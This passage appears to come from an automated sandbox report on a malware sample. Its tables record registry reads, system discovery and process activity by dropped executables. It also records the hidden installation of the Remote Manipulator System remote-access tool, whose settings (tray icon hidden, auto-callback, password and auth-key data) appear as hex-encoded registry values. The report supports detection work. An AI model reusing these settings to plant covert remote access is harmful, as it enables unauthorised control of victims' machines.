| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\50.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\50to.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key security queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\systeminfo.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters\InternetId = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e7465726e65745f69645f73657474696e67732076657273696f6e3d223730313230223e3c696e7465726e65745f69643e3334362d3331392d3834392d3533383c2f696e7465726e65745f69643e3c7573655f696e65745f636f6e6e656374696f6e3e747275653c2f7573655f696e65745f636f6e6e656374696f6e3e3c696e65745f7365727665723e3c2f696e65745f7365727665723e3c7573655f637573746f6d5f696e65745f7365727665723e66616c73653c2f7573655f637573746f6d5f696e65745f7365727665723e3c696e65745f69645f706f72743e353635353c2f696e65745f69645f706f72743e3c7573655f696e65745f69645f697076363e66616c73653c2f7573655f696e65745f69645f697076363e3c696e65745f69645f7573655f70696e3e66616c73653c2f696e65745f69645f7573655f70696e3e3c696e65745f69645f70696e3e3c2f696e65745f69645f70696e3e3c2f726d735f696e7465726e65745f69645f73657474696e67733e0d0a | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters\General = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223730313230223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e5275737369616e3c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3661766a766755477a614d3d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e66616c73653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e66616c73653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e66616c73653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c6c6f675f7573655f77696e646f77733e66616c73653c2f6c6f675f7573655f77696e646f77733e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e5167413341444141526741774145494152414247414559414f41417a414445414e674242414545414e41417a41454d4152414132414551414f514131414559415251424341446b414e674179414545414f414134414430414e414130414451414e414130414334414e414178414451414e41417a414449414f414133414441414e41413d3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343538362e363131393838353138353c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349334d4445794d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e66616c73653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c636c6970626f6172645f7472616e736665725f6d6f64653e303c2f636c6970626f6172645f7472616e736665725f6d6f64653e3c636c6f73655f73657373696f6e5f69646c653e66616c73653c2f636c6f73655f73657373696f6e5f69646c653e3c636c6f73655f73657373696f6e5f69646c655f696e74657276616c3e36303c2f636c6f73655f73657373696f6e5f69646c655f696e74657276616c3e3c73686f775f636f6e6e656374696f6e5f616c6572745f666f725f616c6c3e66616c73653c2f73686f775f636f6e6e656374696f6e5f616c6572745f666f725f616c6c3e3c2f67656e6572616c5f73657474696e67733e0d0a | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\NetworkExplorer.dll,-1 = "Network" | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\Windows Error Reporting | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\windows.storage.dll,-9216 = "This PC" | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\ieframe.dll,-5723 = "The Internet" | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
